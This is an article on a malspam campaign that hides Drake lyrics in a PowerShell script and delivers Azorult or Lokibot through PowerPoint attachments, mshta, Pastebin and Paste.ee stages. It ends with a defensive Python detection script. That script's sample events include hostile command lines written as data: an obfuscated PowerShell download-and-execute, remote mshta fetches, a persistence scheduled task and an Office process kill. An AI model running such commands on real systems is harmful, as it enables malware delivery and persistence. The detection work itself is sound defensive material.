It is no surprise that hackers use songs as bait to spread malware, but their song choice is debatable.
According to a report from cybersecurity firm AppRiver, a hacker going by the online handle Master X is using lyrics from Drake's hit "In My Feelings" (the "Kiki, do you love me?" line) in a malspam campaign that delivers malware through PowerPoint attachments.
In this campaign the lyrics appear in a PowerShell script that runs late in the infection chain; the initial lure is a PowerPoint file, and the final payload is one of two widely used info-stealers, Azorult or Lokibot. Which of the two a given victim receives is chosen by the operator rather than hard-coded into the lure.
For context, Azorult is an information-stealing Trojan that also downloads further payloads (the report describes it as a RAT), while Lokibot steals credentials and other data from the infected host. Azorult was previously seen being pushed to visitors of thousands of compromised Magento shops and delivered through PayPal-themed lures.
According to AppRiver's blog post, the PowerShell script references the song's lyrics, and the whole thing is an email-based campaign: the recipient is asked to open a PowerPoint attachment that ultimately leads to either Lokibot or Azorult being installed.
AppRiver researchers also shared a sample of the emails. The subject line, "TT Remittance Advice" (a telegraphic-transfer payment notice), mimics the payment correspondence used in Business Email Compromise (BEC) fraud and invoice-themed malspam. The emails typically carry two PowerPoint attachments, "INVOO13433361.pss" and "Blank slip.pss."
AppRiver security analyst David Pickett explained that opening either attachment automatically executes a "heavily obfuscated visual basic script." That script calls mshta.exe, the Windows Microsoft HTML Application host, to fetch the next stage from a Bitly-shortened link. Mshta.exe is a legitimate, signed Windows binary for running HTML Applications (.hta) and the script inside them, and because it executes that script outside the browser's security zones, browser protections such as zone restrictions and script blocking do not apply to what it runs.
Once that stage executes, it builds a command line that kills Word or Excel if they are running and reaches out to Pastebin for an encoded script. To keep control of the host, the attacker registers a scheduled task that runs mshta.exe every 60 minutes to poll Pastebin; the encoded script retrieved there decides which of the two payloads is dropped on the device, which is what lets the operator pick the malware per victim.
The Pastebin content decodes to a PowerShell command that contains the reference to the song's lyrics. Notably, the hacker spelled Kiki as "Keke" in the PowerShell script.
“‘Master X’ also obfuscated the ‘DownloadString’ inside this PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity,” AppRiver revealed.
Finally, the PowerShell script contacts Paste.ee to download the final executable, dropped under the innocuous name Calc.exe; that file is the Azorult or Lokibot sample that infects the targeted computer.
The campaign appears to be aimed at enterprises, since the emails are disguised as routine corporate correspondence. It is not yet clear how successful it has been, but so far it does not appear to have infected a large number of computers.
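Every stage described above leaves a distinctive process-creation footprint: mshta.exe started with a URL argument, schtasks creating a task that re-runs a scripting host, taskkill aimed at Office processes, and PowerShell whose DownloadString call has been split to dodge simple string matching. The script below is an added example, not code from the article or from AppRiver, that runs a few such detection rules over constructed process events (image path plus command line, the shape Sysmon event 1 or an EDR exports). The events, task name and URLs are placeholders written for this example; the `normalize_powershell` step is there to undo the `'Down'+'loadString'` style obfuscation the report mentions before matching.

```python
import re

# Constructed process-creation events modelled on the stages in the article.
# These are NOT the AppRiver samples; URLs, paths and task names are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://bit.ly/EXAMPLE"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 60 /tn "Update" '
                '/tr "mshta.exe https://pastebin.com/raw/EXAMPLE"'},
    {"image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /f /im winword.exe /im excel.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c $s='Keke do you love me'; "
                "IEX (New-Object Net.WebClient).('Down'+'loadString')"
                "('https://paste.ee/r/EXAMPLE')"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\bob\AppData\Local\Temp\setup.hta"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmdline": r'"POWERPNT.EXE" /s "C:\Users\bob\Downloads\deck.pps"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Hosts the article names as staging points (shortener, paste sites).
STAGING_HOSTS = ("bit.ly", "pastebin.com", "paste.ee")
OFFICE_PROCS = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript")


def normalize_powershell(cmdline: str) -> str:
    """Undo two cheap PowerShell string tricks before keyword matching:
    'Down'+'loadString' -> 'DownloadString' and Down`loadString -> DownloadString.
    Returns a lower-cased string for case-insensitive comparison."""
    joined = re.sub(r"""['"]\s*\+\s*['"]""", "", cmdline)
    return joined.replace("`", "").lower()


def image_name(image: str) -> str:
    """Last path component of the image, lower-cased (mshta.exe, schtasks.exe ...)."""
    return image.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return a list of (event_index, rule_name, severity) for suspicious events."""
    hits = []
    for i, ev in enumerate(events):
        name = image_name(ev["image"])
        cmd = ev["cmdline"]
        low = cmd.lower()
        urls = URL_RE.findall(cmd)
        staging = any(h in u.lower() for u in urls for h in STAGING_HOSTS)

        if name == "mshta.exe" and urls:
            # HTA fetched straight from the internet; mshta runs it outside browser zones.
            hits.append((i, "mshta_remote_hta", "high" if staging else "medium"))
        elif name == "mshta.exe":
            hits.append((i, "mshta_local_hta", "low"))

        if name == "schtasks.exe" and "/create" in low and any(s in low for s in SCRIPT_HOSTS):
            # A scripting host scheduled to re-run: the article's 60-minute Pastebin poll.
            hits.append((i, "scheduled_script_host", "high" if urls else "medium"))

        if name == "taskkill.exe" and any(p in low for p in OFFICE_PROCS):
            hits.append((i, "office_process_kill", "medium"))

        if name in ("powershell.exe", "pwsh.exe"):
            norm = normalize_powershell(cmd)
            if "downloadstring" in norm or "downloadfile" in norm:
                # If the keyword only appears after normalisation, it was deliberately split.
                obfuscated = "downloadstring" not in low and "downloadfile" not in low
                rule = "powershell_download_obfuscated" if obfuscated else "powershell_download"
                hits.append((i, rule, "high" if (obfuscated or staging) else "medium"))
    return hits


if __name__ == "__main__":
    for idx, rule, sev in analyze(SAMPLE_EVENTS):
        print(f"[{sev:6}] event {idx}: {rule}")
```

The benign PowerPoint launch at the end produces no hit, and a local .hta run is flagged only at low severity, which is the trade-off to tune: mshta with a URL on the command line is rare in a managed enterprise and is the cheapest high-signal rule here, while the scheduled-task rule catches the persistence even if the first stage was missed.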